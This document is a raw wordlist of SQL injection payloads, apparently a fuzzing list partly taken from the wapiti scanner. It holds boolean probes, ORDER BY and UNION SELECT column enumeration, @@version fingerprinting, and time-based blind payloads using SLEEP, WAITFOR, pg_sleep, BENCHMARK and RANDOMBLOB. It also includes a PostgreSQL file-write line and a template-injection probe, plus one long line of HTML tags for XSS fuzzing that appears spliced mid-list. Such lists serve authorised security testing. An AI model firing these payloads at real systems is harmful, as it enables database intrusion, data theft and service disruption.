select * from myfile;copy myfile to /tmp/test; | |
OR 1=1 | |
OR 1=0 | |
OR x=x | |
OR x=y | |
OR 1=1# | |
OR 1=0# | |
OR x=x# | |
OR x=y# | |
OR 1=1-- | |
OR 1=0-- | |
OR x=x-- | |
OR x=y-- | |
OR 3409=3409 AND ('pytW' LIKE 'pytW | |
OR 3409=3409 AND ('pytW' LIKE 'pytY | |
HAVING 1=1 | |
HAVING 1=0 | |
HAVING 1=1# | |
HAVING 1=0# | |
HAVING 1=1-- | |
HAVING 1=0-- | |
AND 1=1 | |
AND 1=0 | |
AND 1=1-- | |
AND 1=0-- | |
AND 1=1# | |
AND 1=0# | |
AND 1=1 AND '%'=' | |
AND 1=0 AND '%'=' | |
AND 1083=1083 AND (1427=1427 | |
AND 7506=9091 AND (5913=5913 | |
AND 1083=1083 AND ('1427=1427 | |
AND 7506=9091 AND ('5913=5913 | |
AND 7300=7300 AND 'pKlZ'='pKlZ | |
AND 7300=7300 AND 'pKlZ'='pKlY | |
AND 7300=7300 AND ('pKlZ'='pKlZ | |
AND 7300=7300 AND ('pKlZ'='pKlY | |
AS INJECTX WHERE 1=1 AND 1=1 | |
AS INJECTX WHERE 1=1 AND 1=0 | |
AS INJECTX WHERE 1=1 AND 1=1# | |
AS INJECTX WHERE 1=1 AND 1=0# | |
AS INJECTX WHERE 1=1 AND 1=1-- | |
AS INJECTX WHERE 1=1 AND 1=0-- | |
WHERE 1=1 AND 1=1 | |
WHERE 1=1 AND 1=0 | |
WHERE 1=1 AND 1=1# | |
WHERE 1=1 AND 1=0# | |
WHERE 1=1 AND 1=1-- | |
WHERE 1=1 AND 1=0-- | |
ORDER BY 1-- | |
ORDER BY 2-- | |
ORDER BY 3-- | |
ORDER BY 4-- | |
ORDER BY 5-- | |
ORDER BY 6-- | |
ORDER BY 7-- | |
ORDER BY 8-- | |
ORDER BY 9-- | |
ORDER BY 10-- | |
ORDER BY 11-- | |
ORDER BY 12-- | |
ORDER BY 13-- | |
ORDER BY 14-- | |
ORDER BY 15-- | |
ORDER BY 16-- | |
ORDER BY 17-- | |
ORDER BY 18-- | |
ORDER BY 19-- | |
ORDER BY 20-- | |
ORDER BY 21-- | |
ORDER BY 22-- | |
ORDER BY 23-- | |
ORDER BY 24-- | |
ORDER BY 25-- | |
ORDER BY 26-- | |
ORDER BY 27-- | |
ORDER BY 28-- | |
ORDER BY 29-- | |
ORDER BY 30-- | |
ORDER BY 31337-- | |
ORDER BY 1# | |
ORDER BY 2# | |
ORDER BY 3# | |
ORDER BY 4# | |
ORDER BY 5# | |
ORDER BY 6# | |
ORDER BY 7# | |
ORDER BY 8# | |
ORDER BY 9# | |
ORDER BY 10# | |
ORDER BY 11# | |
ORDER BY 12# | |
ORDER BY 13# | |
ORDER BY 14# | |
ORDER BY 15# | |
ORDER BY 16# | |
ORDER BY 17# | |
ORDER BY 18# | |
ORDER BY 19# | |
ORDER BY 20# | |
ORDER BY 21# | |
ORDER BY 22# | |
ORDER BY 23# | |
ORDER BY 24# | |
ORDER BY 25# | |
ORDER BY 26# | |
ORDER BY 27# | |
ORDER BY 28# | |
ORDER BY 29# | |
ORDER BY 30# | |
ORDER BY 31337# | |
ORDER BY 1 | |
ORDER BY 2 | |
ORDER BY 3 | |
ORDER BY 4 | |
ORDER BY 5 | |
ORDER BY 6 | |
ORDER BY 7 | |
ORDER BY 8 | |
ORDER BY 9 | |
ORDER BY 10 | |
ORDER BY 11 | |
ORDER BY 12 | |
ORDER BY 13 | |
ORDER BY 14 | |
ORDER BY 15 | |
ORDER BY 16 | |
ORDER BY 17 | |
ORDER BY 18 | |
ORDER BY 19 | |
ORDER BY 20 | |
ORDER BY 21 | |
ORDER BY 22 | |
ORDER BY 23 | |
ORDER BY 24 | |
ORDER BY 25 | |
ORDER BY 26 | |
ORDER BY 27 | |
ORDER BY 28 | |
ORDER BY 29 | |
ORDER BY 30 | |
ORDER BY 31337 | |
RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' | |
RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=' | |
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-- | |
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl-- | |
%' AND 8310=8310 AND '%'=' | |
%' AND 8310=8311 AND '%'=' | |
and (select substring(@@version,1,1))='X' | |
and (select substring(@@version,1,1))='M' | |
and (select substring(@@version,2,1))='i' | |
and (select substring(@@version,2,1))='y' | |
and (select substring(@@version,3,1))='c' | |
and (select substring(@@version,3,1))='S' | |
and (select substring(@@version,3,1))='X' | |
# from wapiti | |
sleep(5)# | |
1 or sleep(5)# | |
" or sleep(5)# | |
' or sleep(5)# | |
" or sleep(5)=" | |
' or sleep(5)=' | |
1) or sleep(5)# | |
") or sleep(5)=" | |
') or sleep(5)=' | |
1)) or sleep(5)# | |
")) or sleep(5)=" | |
')) or sleep(5)=' | |
;waitfor delay '0:0:5'-- | |
);waitfor delay '0:0:5'-- | |
';waitfor delay '0:0:5'-- | |
";waitfor delay '0:0:5'-- | |
');waitfor delay '0:0:5'-- | |
");waitfor delay '0:0:5'-- | |
));waitfor delay '0:0:5'-- | |
'));waitfor delay '0:0:5'-- | |
"));waitfor delay '0:0:5'-- | |
benchmark(10000000,MD5(1))# | |
1 or benchmark(10000000,MD5(1))# | |
" or benchmark(10000000,MD5(1))# | |
' or benchmark(10000000,MD5(1))# | |
1) or benchmark(10000000,MD5(1))# | |
") or benchmark(10000000,MD5(1))# | |
') or benchmark(10000000,MD5(1))# | |
1)) or benchmark(10000000,MD5(1))# | |
")) or benchmark(10000000,MD5(1))# | |
')) or benchmark(10000000,MD5(1))# | |
pg_sleep(5)-- | |
1 or pg_sleep(5)-- | |
" or pg_sleep(5)-- | |
' or pg_sleep(5)-- | |
1) or pg_sleep(5)-- | |
") or pg_sleep(5)-- | |
') or pg_sleep(5)-- | |
1)) or pg_sleep(5)-- | |
")) or pg_sleep(5)-- | |
')) or pg_sleep(5)-- | |
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe | |
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP) | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)-- | |
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)# | |
SLEEP(5)# | |
SLEEP(5)-- | |
SLEEP(5)=" | |
SLEEP(5)=' | |
or SLEEP(5) | |
or SLEEP(5)# | |
or SLEEP(5)-- | |
or SLEEP(5)=" | |
or SLEEP(5)=' | |
waitfor delay '00:00:05' | |
waitfor delay '00:00:05'-- | |
waitfor delay '00:00:05'# | |
benchmark(50000000,MD5(1)) | |
benchmark(50000000,MD5(1))-- | |
benchmark(50000000,MD5(1))# | |
or benchmark(50000000,MD5(1)) | |
or benchmark(50000000,MD5(1))-- | |
or benchmark(50000000,MD5(1))# | |
pg_SLEEP(5) | |
pg_SLEEP(5)-- | |
pg_SLEEP(5)# | |
or pg_SLEEP(5) | |
or pg_SLEEP(5)-- | |
or pg_SLEEP(5)# | |
'\" | |
AnD SLEEP(5) | |
AnD SLEEP(5)-- | |
AnD SLEEP(5)# | |
&&SLEEP(5) | |
&&SLEEP(5)-- | |
&&SLEEP(5)# | |
' AnD SLEEP(5) ANd '1 | |
'&&SLEEP(5)&&'1 | |
ORDER BY SLEEP(5) | |
ORDER BY SLEEP(5)-- | |
ORDER BY SLEEP(5)# | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj) | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)# | |
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)-- | |
+benchmark(3200,SHA1(1))+' | |
+ SLEEP(10) + ' | |
RANDOMBLOB(500000000/2) | |
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) | |
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2)))) | |
RANDOMBLOB(1000000000/2) | |
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) | |
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2)))) | |
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/ | |
ORDER BY SLEEP(5) | |
ORDER BY 1,SLEEP(5) | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')) | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
${{<%[%'"}}%\. | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
ORDER BY SLEEP(5)# | |
ORDER BY 1,SLEEP(5)# | |
ORDER BY 1,SLEEP(5),3# | |
ORDER BY 1,SLEEP(5),3,4# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
ORDER BY SLEEP(5)-- | |
ORDER BY 1,SLEEP(5)-- | |
ORDER BY 1,SLEEP(5),3-- | |
ORDER BY 1,SLEEP(5),3,4-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION ALL SELECT 1 | |
UNION ALL SELECT 1,2 | |
UNION ALL SELECT 1,2,3 | |
UNION ALL SELECT 1,2,3,4 | |
UNION ALL SELECT 1,2,3,4,5 | |
UNION ALL SELECT 1,2,3,4,5,6 | |
UNION ALL SELECT 1,2,3,4,5,6,7 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION ALL SELECT 1# | |
UNION ALL SELECT 1,2# | |
UNION ALL SELECT 1,2,3# | |
UNION ALL SELECT 1,2,3,4# | |
UNION ALL SELECT 1,2,3,4,5# | |
UNION ALL SELECT 1,2,3,4,5,6# | |
UNION ALL SELECT 1,2,3,4,5,6,7# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
<a></a><a2></a2><abbr></abbr><acronym></acronym><address></address><animate></animate><animatemotion></animatemotion><animatetransform></animatetransform><applet></applet><area></area><article></article><aside></aside><audio></audio><audio2></audio2><b></b><base></base><basefont></basefont><bdi></bdi><bdo></bdo><bgsound></bgsound><big></big><blink></blink><blockquote></blockquote><body></body><br></br><button></button><canvas></canvas><caption></caption><center></center><cite></cite><code></code><col></col><colgroup></colgroup><command></command><content></content><custom tags></custom tags><data></data><datalist></datalist><dd></dd><del></del><details></details><dfn></dfn><dialog></dialog><dir></dir><div></div><dl></dl><dt></dt><element></element><em></em><embed></embed><fieldset></fieldset><figcaption></figcaption><figure></figure><font></font><footer></footer><form></form><frame></frame><frameset></frameset><h1></h1><head></head><header></header><hgroup></hgroup><hr></hr><html></html><i></i><iframe></iframe><iframe2></iframe2><image></image><image2></image2><image3></image3><img></img><img2></img2><input></input><input2></input2><input3></input3><input4></input4><ins></ins><isindex></isindex><kbd></kbd><keygen></keygen><label></label><legend></legend><li></li><link></link><listing></listing><main></main><map></map><mark></mark><marquee></marquee><menu></menu><menuitem></menuitem><meta></meta><meter></meter><multicol></multicol><nav></nav><nextid></nextid><nobr></nobr><noembed></noembed><noframes></noframes><noscript></noscript><object></object><ol></ol><optgroup></optgroup><option></option><output></output><p></p><param></param><picture></picture><plaintext></plaintext><pre></pre><progress></progress><q></q><rb></rb><rp></rp><rt></rt><rtc></rtc><ruby></ruby><s></s><samp></samp><script></script><section></section><select></select><set></set><shadow></shadow><slot></slot><small></small><source></source><spacer></spacer><span></span><strike></strike><strong></strong><style></style><sub></sub><summary></summary><sup></sup><svg></svg><table></table><tbody></tbody><td></td><template></template><textarea></textarea><tfoot></tfoot><th></th><thead></thead><time></time><title></title><tr></tr><track></track><tt></tt><u></u><ul></ul><var></var><video></video><video2></video2><wbr></wbr><xmp></xmp> | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
UNION ALL SELECT 1-- | |
UNION ALL SELECT 1,2-- | |
UNION ALL SELECT 1,2,3-- | |
UNION ALL SELECT 1,2,3,4-- | |
UNION ALL SELECT 1,2,3,4,5-- | |
UNION ALL SELECT 1,2,3,4,5,6-- | |
UNION ALL SELECT 1,2,3,4,5,6,7-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION SELECT @@VERSION,SLEEP(5),3 | |
UNION SELECT @@VERSION,SLEEP(5),USER(),4 | |
